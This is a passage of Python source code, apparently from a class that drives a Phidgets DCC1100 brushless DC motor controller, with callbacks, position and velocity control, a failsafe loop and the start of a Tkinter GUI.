def IsNumber0or1(self, InputNumber):
if float(InputNumber) == 0.0 or float(InputNumber) == 1:
return 1
else:
return 0
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def PassThrough0and1values_ExitProgramOtherwise(self, InputNameString, InputNumber):
try:
InputNumber_ConvertedToFloat = float(InputNumber)
except:
exceptions = sys.exc_info()[0]
print("PassThrough0and1values_ExitProgramOtherwise Error. InputNumber must be a float value, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
try:
if InputNumber_ConvertedToFloat == 0.0 or InputNumber_ConvertedToFloat == 1:
return InputNumber_ConvertedToFloat
else:
input("PassThrough0and1values_ExitProgramOtherwise Error. '" +
InputNameString +
"' must be 0 or 1 (value was " +
str(InputNumber_ConvertedToFloat) +
"). Press any key (and enter) to exit.")
sys.exit()
except:
exceptions = sys.exc_info()[0]
print("PassThrough0and1values_ExitProgramOtherwise Error, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def PassThroughFloatValuesInRange_ExitProgramOtherwise(self, InputNameString, InputNumber, RangeMinValue, RangeMaxValue):
try:
InputNumber_ConvertedToFloat = float(InputNumber)
except:
exceptions = sys.exc_info()[0]
print("PassThroughFloatValuesInRange_ExitProgramOtherwise Error. InputNumber must be a float value, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
try:
if InputNumber_ConvertedToFloat >= RangeMinValue and InputNumber_ConvertedToFloat <= RangeMaxValue:
return InputNumber_ConvertedToFloat
else:
input("PassThroughFloatValuesInRange_ExitProgramOtherwise Error. '" +
InputNameString +
"' must be in the range [" +
str(RangeMinValue) +
", " +
str(RangeMaxValue) +
"] (value was " +
str(InputNumber_ConvertedToFloat) + "). Press any key (and enter) to exit.")
sys.exit()
except:
exceptions = sys.exc_info()[0]
print("PassThroughFloatValuesInRange_ExitProgramOtherwise Error, Exceptions: %s" % exceptions)
input("Press any key to continue")
sys.exit()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TellWhichFileWereIn(self):
#We used to use this method, but it gave us the root calling file, not the class calling file
#absolute_file_path = os.path.dirname(os.path.realpath(sys.argv[0]))
#filename = absolute_file_path[absolute_file_path.rfind("\\") + 1:]
frame = inspect.stack()[1]
filename = frame[1][frame[1].rfind("\\") + 1:]
filename = filename.replace(".py","")
return filename
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConAttachCallback(self, HandlerSelf):
try:
##############################
self.BLDCobject.setDataInterval(self.UpdateDeltaT_ms)
self.MyPrint_WithoutLogFile("The device currently has DataInterval: " + str(self.BLDCobject.getDataInterval()))
##############################
##############################
self.BLDCobject.setRescaleFactor(self.RescaleFactor_MultipliesPhidgetsUnits_UserSet)
self.MyPrint_WithoutLogFile("The device currently has RescaleFactor: " + str(self.BLDCobject.getRescaleFactor()))
##############################
############################## Setting StallVelocity to 0 will turn off stall protection functionality
self.BLDCobject.setStallVelocity(self.VelocityStallLimit_PhidgetsUnits_UserSet)
self.MyPrint_WithoutLogFile("The device currently has StallVelocity: " + str(self.BLDCobject.getStallVelocity()))
##############################
##############################
self.Acceleration_PhidgetsUnits_TO_BE_SET = self.AccelerationMaxLimit_PhidgetsUnits_UserSet
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
##############################
##############################
if self.ControlMode == "velocity":
##############################
self.BLDCobject.setTargetBrakingStrength(self.BrakingStrengthLimit_VelControl_PhidgetsUnits_UserSet)
self.MyPrint_WithoutLogFile("The device currently has BrakingStrength: " + str(self.BLDCobject.getTargetBrakingStrength()))
##############################
##############################
if self.ThisIsFirstTimeEverAttachingFlag == 1:
self.Velocity_PhidgetsUnits_TO_BE_SET = 0.0
else:
self.Velocity_PhidgetsUnits_TO_BE_SET = self.Velocity_PhidgetsUnits_FromDevice #Stay wherever you were when you detached
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
##############################
##############################
##############################
elif self.ControlMode == "position":
##############################
self.BLDCobject.setKp(self.Kp_PosControl_Gain_UserSet)
self.MyPrint_WithoutLogFile("The device currently has Kp: " + str(self.BLDCobject.getKp()))
self.BLDCobject.setKi(self.Ki_PosControl_Gain_UserSet)
self.MyPrint_WithoutLogFile("The device currently has Ki: " + str(self.BLDCobject.getKi()))
self.BLDCobject.setKd(self.Kd_PosControl_Gain_UserSet)
self.MyPrint_WithoutLogFile("The device currently has Kd: " + str(self.BLDCobject.getKd()))
##############################
##############################
self.EngagedState_TO_BE_SET = 1
self.EngagedState_NeedsToBeChangedFlag = 1
##############################
##############################
if self.ThisIsFirstTimeEverAttachingFlag == 1:
self.Position_PhidgetsUnits_TO_BE_SET = 0.0
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.DeadBand_PosControl_PhidgetsUnits_UserSet
self.Velocity_PhidgetsUnits_TO_BE_SET = self.VelocityMaxLimit_PhidgetsUnits_UserSet
else:
self.Position_PhidgetsUnits_TO_BE_SET = self.Position_PhidgetsUnits_FromDevice #Stay wherever you were when you detached
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.DeadBand_PosControl_PhidgetsUnits_FromDevice
self.Velocity_PhidgetsUnits_TO_BE_SET = self.VelocityMaxLimit_PhidgetsUnits_UserSet
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
##############################
##############################
##############################
if self.ThisIsFirstTimeEverAttachingFlag == 0:
self.ThisIsFirstTimeEverAttachingFlag = 1
##############################
self.device_connected_flag = 1
self.MyPrint_WithoutLogFile("$$$$$$$$$$ BLDConAttachCallback Attached Event! $$$$$$$$$$")
except PhidgetException as e:
self.device_connected_flag = 0
self.MyPrint_WithoutLogFile("BLDConAttachCallback ERROR: Failed to initialize the BLDC, Phidget Exception %i: %s" % (e.code, e.details))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConDetachCallback(self, HandlerSelf):
self.device_connected_flag = 0
self.MyPrint_WithoutLogFile("$$$$$$$$$$ BLDConDetachCallback Detached Event! $$$$$$$$$$")
try:
self.BLDCobject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
time.sleep(0.250)
except PhidgetException as e:
self.MyPrint_WithoutLogFile("BLDConDetachCallback failed to waitForAttach, Phidget Exception %i: %s" % (e.code, e.details))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConVelocityUpdateCallback(self, HandlerSelf, VelocityUpdatedValue):
self.Velocity_PhidgetsUnits_FromDevice = VelocityUpdatedValue
#self.MyPrint_WithoutLogFile("BLDConVelocityUpdateCallback event: self.Velocity_PhidgetsUnits_FromDevice = " + str(self.Velocity_PhidgetsUnits_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConPositionChangeCallback(self, HandlerSelf, PositionChangedValue):
self.Position_PhidgetsUnits_FromDevice = PositionChangedValue
self.CurrentTime_OnPositionChangeCallbackFunction = self.getPreciseSecondsTimeStampString()
self.UpdateFrequencyCalculation_OnPositionChangeCallbackFunction()
self.Velocity_PhidgetsUnits_DifferentiatedRaw = (self.Position_PhidgetsUnits_FromDevice - self.Position_PhidgetsUnits_FromDevice_Last)/(self.DataStreamingDeltaT_OnPositionChangeCallbackFunction)
self.Velocity_PhidgetsUnits_DifferentiatedSmoothed = self.Velocity_LowPassFilter_ReubenPython2and3ClassObject.AddDataPointFromExternalProgram(self.Velocity_PhidgetsUnits_DifferentiatedRaw)["SignalOutSmoothed"]
self.Position_PhidgetsUnits_FromDevice_Last = self.Position_PhidgetsUnits_FromDevice
#self.MyPrint_WithoutLogFile("BLDConPositionChangeCallback event: self.Position_PhidgetsUnits_FromDevice = " + str(self.Position_PhidgetsUnits_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConDutyCycleUpdateCallback(self, HandlerSelf, DutyCycleUpdatedValue):
self.DutyCycle_PhidgetsUnits_FromDevice = DutyCycleUpdatedValue
#self.MyPrint_WithoutLogFile("BLDConDutyCycleUpdateCallback event: self.DutyCycle_PhidgetsUnits_FromDevice = " + str(self.DutyCycle_PhidgetsUnits_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def BLDConErrorCallback(self, HandlerSelf, code, description):
self.MyPrint_WithoutLogFile("----------")
self.MyPrint_WithoutLogFile("BLDConErrorCallback Code: " + ErrorEventCode.getName(code) + ", Description: " + str(description))
self.MyPrint_WithoutLogFile("----------")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnAttachCallback(self, HandlerSelf):
self.MyPrint_WithoutLogFile("$$$$$$$$$$ TemperatureOnAttachCallback Attached Event! $$$$$$$$$$")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnDetachCallback(self, HandlerSelf):
self.MyPrint_WithoutLogFile("$$$$$$$$$$ TemperatureOnDetachCallback Detached Event! $$$$$$$$$$")
try:
self.TemperatureObject.openWaitForAttachment(self.WaitForAttached_TimeoutDuration_Milliseconds)
time.sleep(0.250)
except PhidgetException as e:
self.MyPrint_WithoutLogFile("TemperatureOnDetachCallback failed to waitForAttach, Phidget Exception %i: %s" % (e.code, e.details))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnChangeCallback(self, HandlerSelf, TemperatureChangedValue):
self.Temperature_DegC_FromDevice = TemperatureChangedValue
#self.MyPrint_WithoutLogFile("TemperatureOnChangeCallback event: self.Temperature_DegC_FromDevice = " + str(self.Temperature_DegC_FromDevice))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TemperatureOnErrorCallback(self, HandlerSelf, code, description):
self.MyPrint_WithoutLogFile("----------")
self.MyPrint_WithoutLogFile("TemperatureOnErrorCallback Code: " + ErrorEventCode.getName(code) + ", Description: " + str(description))
self.MyPrint_WithoutLogFile("----------")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def getTimeStampString(self):
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('date-%m-%d-%Y---time-%H-%M-%S')
return st
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString(self):
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def UpdateFrequencyCalculation_MainThread(self):
try:
self.DataStreamingDeltaT_CalculatedFromMainThread = self.CurrentTime_CalculatedFromMainThread - self.LastTime_CalculatedFromMainThread
if self.DataStreamingDeltaT_CalculatedFromMainThread != 0.0:
self.DataStreamingFrequency_CalculatedFromMainThread = 1.0/self.DataStreamingDeltaT_CalculatedFromMainThread
self.LastTime_CalculatedFromMainThread = self.CurrentTime_CalculatedFromMainThread
except:
exceptions = sys.exc_info()[0]
print("UpdateFrequencyCalculation_MainThread ERROR with Exceptions: %s" % exceptions)
traceback.print_exc()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def UpdateFrequencyCalculation_OnPositionChangeCallbackFunction(self):
try:
self.DataStreamingDeltaT_OnPositionChangeCallbackFunction = self.CurrentTime_OnPositionChangeCallbackFunction - self.LastTime_OnPositionChangeCallbackFunction
if self.DataStreamingDeltaT_OnPositionChangeCallbackFunction != 0.0:
self.DataStreamingFrequency_OnPositionChangeCallbackFunction = 1.0/self.DataStreamingDeltaT_OnPositionChangeCallbackFunction
self.LastTime_OnPositionChangeCallbackFunction = self.CurrentTime_OnPositionChangeCallbackFunction
except:
exceptions = sys.exc_info()[0]
print("UpdateFrequencyCalculation_OnPositionChangeCallbackFunction ERROR with Exceptions: %s" % exceptions)
traceback.print_exc()
##########################################################################################################
##########################################################################################################
##########################################################################################################
########################################################################################################## unicorn
def CommandMotorFromExternalProgram_PositionControl(self, commanded_position_PhidgetsUnits, commanded_velocity_limit_PhidgetsUnits = -11111.0):
######################
if self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG == 0:
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 0")
return 0
######################
######################
if self.ControlMode != "position":
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: self.ControlMode must be 'position'")
return 0
######################
######################
self.Position_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.PositionMinLimit_PhidgetsUnits_UserSet, self.PositionMaxLimit_PhidgetsUnits_UserSet, commanded_position_PhidgetsUnits)
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
######################
######################
if commanded_velocity_limit_PhidgetsUnits != -11111.0:
if commanded_velocity_limit_PhidgetsUnits != self.Velocity_PhidgetsUnits_TO_BE_SET:
self.Velocity_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.VelocityMinLimit_PhidgetsUnits_UserSet, self.VelocityMaxLimit_PhidgetsUnits_UserSet, commanded_velocity_limit_PhidgetsUnits)
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
######################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def CommandMotorFromExternalProgram_VelocityControl(self, commanded_velocity_PhidgetsUnits):
######################
if self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG == 0:
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 0")
return 0
######################
######################
if self.ControlMode != "velocity":
self.MyPrint_WithoutLogFile("CommandMotorFromExternalProgram ERROR: self.ControlMode must be 'velocity'")
return 0
######################
######################
self.Velocity_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.VelocityMinLimit_PhidgetsUnits_UserSet, self.VelocityMaxLimit_PhidgetsUnits_UserSet, commanded_velocity_PhidgetsUnits)
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
######################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def StopMotor(self):
if self.ControlMode == "velocity":
self.Velocity_PhidgetsUnits_TO_BE_SET = 0
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
elif self.ControlMode == "position":
self.EngagedState_TO_BE_SET = 0
self.EngagedState_NeedsToBeChangedFlag = 1
self.MyPrint_WithoutLogFile("StopMotor function called!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def SetPositionOffsetOnBoardWithoutMoving(self, commanded_position_offset_value_PhidgetsUnits):
commanded_position_offset_value_PhidgetsUnits_LIMITED = self.limitNumber(self.PositionMinLimit_PhidgetsUnits_UserSet, self.PositionMaxLimit_PhidgetsUnits_UserSet, commanded_position_offset_value_PhidgetsUnits)
try:
self.BLDCobject.addPositionOffset(commanded_position_offset_value_PhidgetsUnits_LIMITED)
self.MyPrint_WithoutLogFile("SetPositionOffsetOnBoardWithoutMoving issued addPositionOffset for value of " + str(commanded_position_offset_value_PhidgetsUnits_LIMITED))
return 1
except PhidgetException as e:
self.MyPrint_WithoutLogFile("SetPositionOffsetOnBoardWithoutMoving ERROR, Phidget Exception %i: %s" % (e.code, e.details))
return 0
##########################################################################################################
##########################################################################################################
##########################################################################################################
########################################################################################################## unicorn
def HomeMotorInPlace(self):
Position_PhidgetsUnits_FromDevice_JUST_QUERIED = self.BLDCobject.getPosition()
self.MyPrint_WithoutLogFile("HomeMotorInPlace Position_PhidgetsUnits_FromDevice_JUST_QUERIED BEFORE adding offset: " + str(Position_PhidgetsUnits_FromDevice_JUST_QUERIED))
self.BLDCobject.addPositionOffset(-1.0*Position_PhidgetsUnits_FromDevice_JUST_QUERIED) #MUST HAVE THE MINUS SIGN, OR ELSE THE OFFSET DOESN'T SET UT TO ZERO.
Position_PhidgetsUnits_FromDevice_JUST_QUERIED = self.BLDCobject.getPosition()
self.MyPrint_WithoutLogFile("HomeMotorInPlace Position_PhidgetsUnits_FromDevice_JUST_QUERIED AFTER adding offset: " + str(Position_PhidgetsUnits_FromDevice_JUST_QUERIED))
if self.ControlMode == "position":
for counter in range(0, 4): #SEND COMMAND MULTIPLE TIMES TO MAKE SURE THAT IT TAKES!
self.Position_PhidgetsUnits_TO_BE_SET = 0.0
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 1
time.sleep(0.005)
self.MyPrint_WithoutLogFile("----- HomeMotorInPlace just performed! -----")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def MainThread(self): #unicorn
self.MyPrint_WithoutLogFile("Started MainThread for PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class.")
self.MainThread_still_running_flag = 1
self.ACCEPT_EXTERNAL_POSITION_COMMANDS_FLAG = 1
self.BLDCobject.enableFailsafe(self.FailsafeTime_Milliseconds)
self.StartingTime_CalculatedFromMainThread = self.getPreciseSecondsTimeStampString()
###############################################
while self.EXIT_PROGRAM_FLAG == 0:
###############################################
self.CurrentTime_CalculatedFromMainThread = self.getPreciseSecondsTimeStampString() - self.StartingTime_CalculatedFromMainThread
###############################################
###############################################
if self.CurrentTime_CalculatedFromMainThread - self.LastTime_FailsafeWasReset >= 0.5*self.FailsafeTime_Milliseconds/1000.0: #IF YOU CALL resetFailsafe every PID loop, it'll kill your loop frequency
#self.MyPrint_WithoutLogFile("RESET FAILSAFE AT TIME = " + str(self.CurrentTime_CalculatedFromMainThread))
self.BLDCobject.resetFailsafe() #resetFailsafe is faster than enableFailsafe
self.LastTime_FailsafeWasReset = self.CurrentTime_CalculatedFromMainThread
###############################################
###############################################
############################################### Start SETs
###############################################
if self.StopMotor_NeedsToBeChangedFlag == 1:
self.StopMotor()
self.StopMotor_NeedsToBeChangedFlag = 0
###############################################
###############################################
if self.HomeMotorInPlace_NeedsToBeHomedFlag == 1:
self.HomeMotorInPlace()
self.HomeMotorInPlace_NeedsToBeHomedFlag = 0
###############################################
###############################################
if self.EngagedState_NeedsToBeChangedFlag == 1 and self.ControlMode == "position":
try:
#self.MyPrint_WithoutLogFile("Sending Engaged State to the Phidget.")
self.BLDCobject.setEngaged(self.EngagedState_TO_BE_SET)
if self.BLDCobject.getEngaged() == 1:
self.EngagedState_NeedsToBeChangedFlag = 0
except:
self.MyPrint_WithoutLogFile("ERROR: Failed to change EngagedState!")
###############################################
############################################### Tx portion
if self.Position_PhidgetsUnits_NeedsToBeChangedFlag == 1 and self.ControlMode == "position":
try:
#self.MyPrint_WithoutLogFile("Sending Position to the Phidget, value of " + str(self.Position_PhidgetsUnits_TO_BE_SET))
self.Position_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.PositionMinLimit_PhidgetsUnits_UserSet, self.PositionMaxLimit_PhidgetsUnits_UserSet, self.Position_PhidgetsUnits_TO_BE_SET)
self.BLDCobject.setTargetPosition(float(self.Position_PhidgetsUnits_TO_BE_SET))
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setTargetPosition, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
if self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag == 1:
try:
#self.MyPrint_WithoutLogFile("Sending Velocity to the Phidget.")
self.Velocity_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.VelocityMinLimit_PhidgetsUnits_UserSet, self.VelocityMaxLimit_PhidgetsUnits_UserSet, self.Velocity_PhidgetsUnits_TO_BE_SET)
if self.ControlMode == "position":
self.BLDCobject.setVelocityLimit(float(self.Velocity_PhidgetsUnits_TO_BE_SET))
elif self.ControlMode == "velocity":
self.BLDCobject.setTargetVelocity(float(self.Velocity_PhidgetsUnits_TO_BE_SET))
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setVelocityLimit, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
if self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag == 1:
try:
#self.MyPrint_WithoutLogFile("Sending Acceleration to the Phidget.")
self.Acceleration_PhidgetsUnits_TO_BE_SET = self.limitNumber(self.AccelerationMinLimit_PhidgetsUnits_FromDevice, self.AccelerationMaxLimit_PhidgetsUnits_FromDevice, self.Acceleration_PhidgetsUnits_TO_BE_SET)
self.BLDCobject.setAcceleration(float(self.Acceleration_PhidgetsUnits_TO_BE_SET))
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setAcceleration, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
if self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag == 1 and self.ControlMode == "position":
try:
self.MyPrint_WithoutLogFile("Sending DeadBand to the Phidget, value = " + str(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.limitNumber(0, self.PositionMaxLimit_PhidgetsUnits_UserSet, self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET) #Limit to max position since DeadBand is in position units
self.BLDCobject.setDeadBand(float(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
#time.sleep(0.001)
self.DeadBand_PosControl_PhidgetsUnits_FromDevice = self.BLDCobject.getDeadBand()
#print("self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET: " + str(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
if self.DeadBand_PosControl_PhidgetsUnits_FromDevice == self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET:
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 0
except PhidgetException as e:
self.MyPrint_WithoutLogFile("Failed setTargetDeadBand, Phidget Exception %i: %s" % (e.code, e.details))
###############################################
###############################################
############################################### End SETs
###############################################
############################################### Start GETs
if self.ControlMode == "position":
self.EngagedState_PhidgetsUnits_FromDevice = self.BLDCobject.getEngaged() #NOT INCLUDING UNDER ENABLE_GETS_MAINTHREAD BECAUSE THIS IS CRITICAL TO FUNCTIONALITY
if self.ENABLE_GETS_MAINTHREAD == 1:
self.VelocityStall_PhidgetsUnits_FromDevice = self.BLDCobject.getStallVelocity()
self.Acceleration_PhidgetsUnits_FromDevice = self.BLDCobject.getAcceleration()
if self.ControlMode == "position":
self.DeadBand_PosControl_PhidgetsUnits_FromDevice = self.BLDCobject.getDeadBand()
#print(self.DeadBand_PosControl_PhidgetsUnits_FromDevice)
###############################################
############################################### End GETs
###############################################
self.MostRecentDataDict = dict([("Position_PhidgetsUnits_FromDevice", self.Position_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_FromDevice", self.Velocity_PhidgetsUnits_FromDevice),
("Velocity_PhidgetsUnits_DifferentiatedRaw", self.Velocity_PhidgetsUnits_DifferentiatedRaw),
("Velocity_PhidgetsUnits_DifferentiatedSmoothed", self.Velocity_PhidgetsUnits_DifferentiatedSmoothed),
("DutyCycle_PhidgetsUnits_FromDevice", self.DutyCycle_PhidgetsUnits_FromDevice),
("Temperature_DegC_FromDevice", self.Temperature_DegC_FromDevice),
("Time", self.CurrentTime_CalculatedFromMainThread)])
###############################################
############################################### USE THE TIME.SLEEP() TO SET THE LOOP FREQUENCY
###############################################
###############################################
self.UpdateFrequencyCalculation_MainThread()
if self.MainThread_TimeToSleepEachLoop > 0.0:
time.sleep(self.MainThread_TimeToSleepEachLoop)
###############################################
###############################################
###############################################
###############################################
self.MyPrint_WithoutLogFile("Finished the MainThread for PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class object.")
self.MainThread_still_running_flag = 0
return 0
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GetMostRecentDataDict(self):
return self.MostRecentDataDict
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback(self):
print("Exiting all threads for Phidgets4EncoderAndDInput1047_ReubenPython2and3Class object")
self.EXIT_PROGRAM_FLAG = 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def StartGUI(self, GuiParent=None):
GUI_Thread_ThreadingObject = threading.Thread(target=self.GUI_Thread, args=(GuiParent,))
GUI_Thread_ThreadingObject.setDaemon(True) #Should mean that the GUI thread is destroyed automatically when the main thread is destroyed.
GUI_Thread_ThreadingObject.start()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread(self, parent=None):
print("Starting the GUI_Thread for PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class object.")
###################################################
if parent == None: #This class object owns root and must handle it properly
self.root = Tk()
self.parent = self.root
################################################### SET THE DEFAULT FONT FOR ALL WIDGETS CREATED AFTTER/BELOW THIS CALL
default_font = tkFont.nametofont("TkDefaultFont")
default_font.configure(size=8)
self.root.option_add("*Font", default_font)
###################################################
else:
self.root = parent
self.parent = parent
###################################################
###################################################
self.myFrame = Frame(self.root)
if self.UseBorderAroundThisGuiObjectFlag == 1:
self.myFrame["borderwidth"] = 2
self.myFrame["relief"] = "ridge"
self.myFrame.grid(row = self.GUI_ROW,
column = self.GUI_COLUMN,
padx = self.GUI_PADX,
pady = self.GUI_PADY,
rowspan = self.GUI_ROWSPAN,
columnspan= self.GUI_COLUMNSPAN)
###################################################
###################################################
self.TKinter_LightGreenColor = '#%02x%02x%02x' % (150, 255, 150) #RGB
self.TKinter_LightRedColor = '#%02x%02x%02x' % (255, 150, 150) #RGB
self.TKinter_LightYellowColor = '#%02x%02x%02x' % (255, 255, 150) # RGB
self.TKinter_DefaultGrayColor = '#%02x%02x%02x' % (240, 240, 240) # RGB
self.TkinterScaleWidth = 10
self.TkinterScaleLength = 250
###################################################
###################################################
self.device_info_label = Label(self.myFrame, text="Device Info", width=75)
self.device_info_label["text"] = self.NameToDisplay_UserSet + \
"\nDevice Name: " + self.DetectedDeviceName + \
"\nVINT SerialNumber: " + str(self.VINT_DetectedSerialNumber) + \
"\nDeviceID: " + str(self.DetectedDeviceID) + \
"\nFW Ver: " + str(self.DetectedDeviceVersion) + \
"\nLibrary Ver: " + str(self.DetectedDeviceLibraryVersion)
self.device_info_label.grid(row=0, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
###################################################
###################################################
self.data_label = Label(self.myFrame, text="Data Info", width=75)
self.data_label.grid(row=1, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
###################################################
########################
self.PrintToGui_Label = Label(self.myFrame, text="PrintToGui_Label", width=75)
if self.EnableInternal_MyPrint_Flag == 1:
self.PrintToGui_Label.grid(row=2, column=0, padx=1, pady=1, columnspan=1, rowspan=10)
########################
#################################################
self.Position_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="Position", width=20)
self.Position_PhidgetsUnits_ScaleLabel.grid(row=1, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
# self.PositionMinLimit_PhidgetsUnits_UserSet,\ #self.PositionMaxLimit_PhidgetsUnits_UserSet, \
self.Position_PhidgetsUnits_ScaleValue = DoubleVar()
self.Position_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=self.PositionMinLimit_PhidgetsUnits_UserSet,\
to= self.PositionMaxLimit_PhidgetsUnits_UserSet,\
#tickinterval=(self.Position_PhidgetsUnits_max - self.Position_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.1,\
variable=self.Position_PhidgetsUnits_ScaleValue)
self.Position_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="Position": self.Position_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Position_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="Position": self.Position_PhidgetsUnits_ScaleResponse(event, name))
self.Position_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="Position": self.Position_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Position_PhidgetsUnits_Scale.set(self.Position_PhidgetsUnits_TO_BE_SET)
self.Position_PhidgetsUnits_Scale.grid(row=1, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
if self.ControlMode == "velocity":
self.Position_PhidgetsUnits_Scale["state"] = "disabled"
#################################################
#################################################
self.Velocity_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="Velocity", width=20)
self.Velocity_PhidgetsUnits_ScaleLabel.grid(row=2, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
self.Velocity_PhidgetsUnits_ScaleValue = DoubleVar()
self.Velocity_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=self.VelocityMinLimit_PhidgetsUnits_UserSet,\
to=self.VelocityMaxLimit_PhidgetsUnits_UserSet, \
#tickinterval=(self.Velocity_PhidgetsUnits_max - self.Velocity_PhidgetsUnits_min) / 2.0,\
